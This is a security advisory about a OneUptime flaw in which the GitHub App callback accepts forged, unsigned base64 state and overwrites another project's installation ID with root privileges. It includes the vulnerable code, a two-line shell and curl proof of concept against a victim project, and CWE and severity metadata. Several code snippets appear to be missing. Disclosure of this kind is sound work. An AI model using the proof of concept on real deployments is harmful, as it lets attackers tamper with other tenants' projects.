OneUptime's GitHub App callback trusts attacker-controlled state and installation_id values and updates Project.gitHubAppInstallationId with isRoot: true without validating that the caller is authorized for the target project. This allows an attacker to overwrite another project's GitHub App installation binding.
Related GitHub endpoints also lack effective authorization, so a valid installation ID can be used to enumerate repositories and create CodeRepository records in an arbitrary project.
The callback decodes unsigned base64 JSON from state and uses the embedded projectId directly:
It then writes the supplied installation_id into the target project with root privileges:
await ProjectService.updateOneById({
id: new ObjectID(projectId),
data: { gitHubAppInstallationId: installationId },
props: { isRoot: true },
});
The userId in state is only checked for presence, not authenticity:
The install flow also generates state as plain base64 JSON, not a signed or session-bound token:
The follow-on endpoints are also vulnerable:
Public: https://github.com/OneUptime/oneuptime/blob/master/Common/Server/Middleware/UserAuthorization.ts#L205-L211Minimal proof of unauthorized project tampering:
STATE=$(printf '%s' '{"projectId":"<victim-project-uuid>","userId":"x"}' | base64 | tr -d '\n')
curl -isk "https://<host>/api/github/auth/callback?installation_id=999999999&state=${STATE}"
Expected result:
302 redirect to /dashboard/<victim-project-uuid>/code-repository?installation_id=999999999gitHubAppInstallationId is overwrittenProject.gitHubAppInstallationIdCodeRepository records in arbitrary projects{
"cwe_ids": [
"CWE-345",
"CWE-639",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-09T17:29:47Z",
"nvd_published_at": "2026-03-10T17:40:16Z",
"severity": "HIGH"
}